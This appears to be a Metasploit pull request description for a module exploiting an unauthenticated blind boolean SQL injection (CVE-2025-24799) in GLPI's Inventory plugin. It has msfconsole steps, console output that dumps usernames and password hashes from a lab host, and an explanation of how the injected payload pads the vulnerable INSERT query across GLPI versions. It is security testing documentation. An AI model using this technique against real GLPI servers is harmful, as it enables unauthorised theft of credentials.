GLPI Inventory Plugin Unauth Blind Boolean SQLi (CVE-2025-24799)

[jheysel-r7]

GLPI <= 1.0.18 fails to properly sanitize user supplied data when sent inside a SimpleXMLElement (available to unauthenticated users), prior to using it in a dynamically constructed SQL query. As a result, unauthenticated attackers can conduct an SQL injection attack to dump sensitive data from the backend database such as usernames and password hashes.

In order for GLPI to be exploitable the GLPI Inventory plugin must be installed and enabled, and the "Enable Inventory" radio button inside the administration configuration also must be checked.

Verification

1. Start msfconsole.
2. Do: use gather/glpi_inventory_plugin_unauth_sqli.
3. Set the RHOST.
4. Set MAX_ENTRIES to 1 to speed up module run time for verification.
5. Run the module.
6. Receive a table with one username and it's corresponding password hash.

Testing

msf6 > use gather/glpi_inventory_plugin_unauth_sqli
msf6 auxiliary(gather/glpi_inventory_plugin_unauth_sqli) > set rhost 172.16.199.130
rhost => 172.16.199.130
msf6 auxiliary(gather/glpi_inventory_plugin_unauth_sqli) > exploit 
[*] Reloading module...
[*] Running module against 172.16.199.130
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable.
[*] Extracting credential information
glpi_users
==========
 name                   password
 ----                   --------
 Plugin_GLPI_Inventory  39
 glpi                   $2y$10$ci01zoEXHWOfoxietd8ry.2K6Y3wR5bc1dZQiftuFM5hqQtPgD6LS
 glpi-system
 normal                 $2y$10$iaxy0646EhwsuBbjAgme4uJN6SN.pbyK.ciTCnep67Wq8x.qt1JvS
 post-only              $2y$10$//Ca44JjRIV/9Hv1IEM1y.v1aEa3FwzytX4QYtKsxyqF/rnOzROei
 tech                   $2y$10$KjaOxGSyd0CMifvDVNiggOxCVHP0g8jER/jLtZsmF54S63LH5GWIy
[*] Auxiliary module execution completed

[jheysel-r7]

I've added the method #verify_extra_columns in order to account for the difference in database schemas across vulnerable versions.

This is what the vulnerable INSERT query looks like on 10.0.17:

INSERT INTO `glpi_agents` (`deviceid`, `name`, `last_contact`, `useragent`, `agenttypes_id`, `itemtype`, `remote_addr`, `items_id`, `threads_networkdiscovery`, `threads_networkinventory`, `timeout_networkdiscovery`, `timeout_networkinventory`) VALUES ('<payload>

In order to make this a valid query we must ensure that we are passing values into all fields in the INSERT statement. The deviceid field is the field vulnerable to SQLi so it will be an empty string as the leading single quote our payload will be the deviceid parameter’s closing quote in the query. The next field name will contain our blind boolean payload and after that we must prepend 10 (for version 10.0.17) values (we will use 0’s) in order to construct a valid query.

This is what the vulnerable INSERT query looks like on 10.0.0:

INSERT INTO `glpi_agents` (`deviceid`, `name`, `last_contact`, `useragent`, `agenttypes_id`, `itemtype`, `items_id`) VALUES (''

Note how this INSERT statement requires a different number of values to be inserted in order to make a valid query.

I explored the option of trying to add a version check to avoid the need to brute force this value (by going through the commit history GLPI and mapping versions to required fields). Although it didn't seem like the version was remotely accessible/ that seemed arduous. We have an older GLPI module with a version check but it no longer works for 10.0.X versions.

I've tested the current solution on versions 10.0.0 and 10.0.17